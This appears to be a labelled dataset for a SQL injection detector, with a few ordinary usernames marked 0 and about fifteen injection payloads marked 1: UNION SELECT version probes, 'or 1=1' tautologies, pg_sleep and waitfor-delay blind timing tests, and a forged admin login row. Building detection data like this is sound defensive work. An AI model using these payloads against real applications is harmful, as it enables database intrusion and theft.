legitimas
c7o5ologa,0
isador,0
90179643r,0
peng1in,0
cazallas caminal,0

maliciosas

" select * from users where id  =  '1' %!<@ union select 1,version  (    )   -- 1'",1
" select * from users where id  =  1 or ""&  (  "" or 1  =  1 -- 1",1
" select * from users where id  =  1 or ""?  (  "" or 1  =  1 -- 1",1
1 or pg_sleep  (  __TIME__  )  --,1
"; if not  (  substring   (    (   select @@version  )  ,24,1  )   <> 1  )   waitfor delay '0:0:2' --",1
 )   or   (  'a'  =  'a,1
admin' or 1  =  1#,1
" select * from users where id  =  '1' or $+<$ union select 1,@@VERSION -- 1'",1
" select * from users where id  =  1 +1 union select 1,banner from v$version where rownum  =  1 -- 1",1
"admin"" or ""1""  =  ""1",1
 union   (  select @@version  )   --,1
" select * from users where id  =  1 or "";{"" or 1  =  1 -- 1",1
" select * from users where id  =  1 or 1#""@ union select version  (    )  ,version  (    )   -- 1",1
"1234 ' AND 1  =  0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",1
" select * from users where id  =  '1'<@$$ union select 1,version  (    )   -- 1'",1
